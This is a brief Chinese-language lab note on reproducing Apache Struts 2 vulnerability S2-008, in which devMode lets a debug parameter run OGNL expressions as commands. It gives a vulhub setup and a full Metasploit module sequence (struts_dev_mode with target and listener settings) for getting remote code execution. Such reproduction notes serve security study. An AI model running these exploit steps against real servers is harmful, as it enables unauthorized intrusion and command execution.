漏洞复现

s2-008命令执行

概述

产生原因

devMode 模式下直接添加参数?debug=command&expression=<OGNL EXP>,会直接执行后面的 OGNL 表达式,因此可以直接执行命令

影响

Struts 2.0.0 Struts 2.3.17

环境搭建

vulhub

1
2
cd struts2/s2-008
docker-compose up -d

复现

见利用

攻防

利用

msf中exploit/multi/http/struts_dev_mode模块

1
2
3
4
5
6
7
use exploit/multi/http/struts_dev_mode
set RHOSTS 192.168.0.188
set RPORT 8081
set LHOST 192.168.0.188
set LPORT 4444
set TARGETURI /S2-008/devmode.action
exploit

防御

升级

参考

S2-008 Apache Struts 2 Wiki Apache Software Foundation